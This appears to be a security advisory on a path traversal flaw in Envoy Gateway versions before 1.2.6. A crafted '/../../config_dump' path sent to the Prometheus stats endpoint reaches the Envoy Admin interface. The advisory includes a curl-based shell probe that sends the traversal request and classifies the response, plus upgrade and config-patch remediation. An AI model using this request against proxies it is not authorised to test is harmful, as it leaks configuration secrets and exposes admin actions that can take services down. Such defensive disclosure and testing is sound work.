Envoy Gateway Path Traversal Vulnerability Allowing Unauthorized Access to Admin Interface Commands
Vulnerability
A path traversal vulnerability has been identified in Envoy Gateway versions prior to 1.2.6. It allows users with access to the Kubernetes cluster to execute Envoy Admin interface commands on proxies managed by Envoy Gateway without needing direct access to the Admin interface: the proxy's Prometheus stats endpoint, which is meant to expose only metrics, forwards a crafted path to the Admin interface. The Admin interface can be used to terminate the Envoy process and to extract the running Envoy configuration, which may contain sensitive data.
Impact
Exploitation gives an attacker who can reach a managed proxy's stats endpoint the capabilities of the Envoy Admin interface on that proxy: destructive actions such as terminating the Envoy process, which takes down every route the proxy serves, and disclosure of the Envoy configuration, which may contain confidential information.
Reproduction
To reproduce this vulnerability, send an HTTP request to the Prometheus stats endpoint of an Envoy proxy managed by Envoy Gateway with a path traversal sequence appended to the stats path: a '/../../config_dump' suffix causes the Admin interface to return its configuration dump, which may contain sensitive information, instead of the Prometheus metrics. The client must send the path verbatim; clients that normalize dot segments before sending (curl does so unless invoked with --path-as-is) never reach the Admin endpoint and will appear to show the proxy as unaffected.
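The following probe is an added example, not part of the advisory or of Envoy Gateway, for checking one of your own proxies for the behaviour described above. It assumes the stats endpoint is reachable at a base URL you supply in STATS_URL (the default is a placeholder), uses /stats/prometheus, Envoy's Admin interface Prometheus endpoint, as the stats path, and classifies the response with a simple heuristic (a config dump is JSON with a top-level "configs" key, metrics are Prometheus text); the test bodies are constructed.

```shell
#!/bin/sh
# Added example (not from the advisory): probe whether a proxy's Prometheus
# stats endpoint forwards a path traversal sequence to the Envoy Admin
# interface. STATS_URL is a placeholder; point it at the stats endpoint of
# the proxy under test.

STATS_URL="${STATS_URL:-http://127.0.0.1:19001}"

# Classify a response body. Prints "config_dump" if the body looks like the
# Admin interface's /config_dump JSON, "metrics" if it is Prometheus text,
# and "other" for anything else (assumed heuristics, good enough for a probe).
classify_body() {
    body="$1"
    case "$body" in
        *'"configs"'*) echo "config_dump" ;;
        *'# TYPE '*|*'# HELP '*) echo "metrics" ;;
        *) echo "other" ;;
    esac
}

# Send the traversal request. --path-as-is keeps the "/../.." segments in the
# request line; without it curl normalizes the path to /config_dump on the
# client side and the probe tests the wrong thing.
# Returns 0 when the traversal was not honoured, 1 when a config dump came
# back (vulnerable), 2 when no response was received.
probe() {
    base="$1"
    body="$(curl -sS --path-as-is --max-time 5 \
        "$base/stats/prometheus/../../config_dump")" || return 2
    verdict="$(classify_body "$body")"
    echo "$verdict"
    [ "$verdict" = "config_dump" ] && return 1
    return 0
}

# Only run the network probe when asked, so the functions above can be
# sourced or tested without a live proxy.
if [ "${1:-}" = "--probe" ]; then
    probe "$STATS_URL"
    case $? in
        0) echo "not reproducible: traversal did not reach the Admin interface" ;;
        1) echo "VULNERABLE: configuration dump returned via the stats endpoint" ;;
        *) echo "probe failed: no response from $STATS_URL" ;;
    esac
fi
```

Run it as `STATS_URL=http://<proxy-stats-address> sh probe.sh --probe`. A "metrics" or "other" verdict after the fix is the expected outcome; treat "config_dump" as confirmation that the proxy is still exposed.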
Remediation
Envoy Gateway users should update to version 1.2.6 or later, which addresses this vulnerability. Where upgrading is not immediately possible, a bootstrap config patch can be applied using the EnvoyProxy API to restrict the Prometheus stats route so that it matches only the exact metrics path rather than any path beginning with it, which stops the traversal suffix from being forwarded to the Admin interface. After applying either fix, re-send the reproduction request above and confirm that it no longer returns the configuration dump.
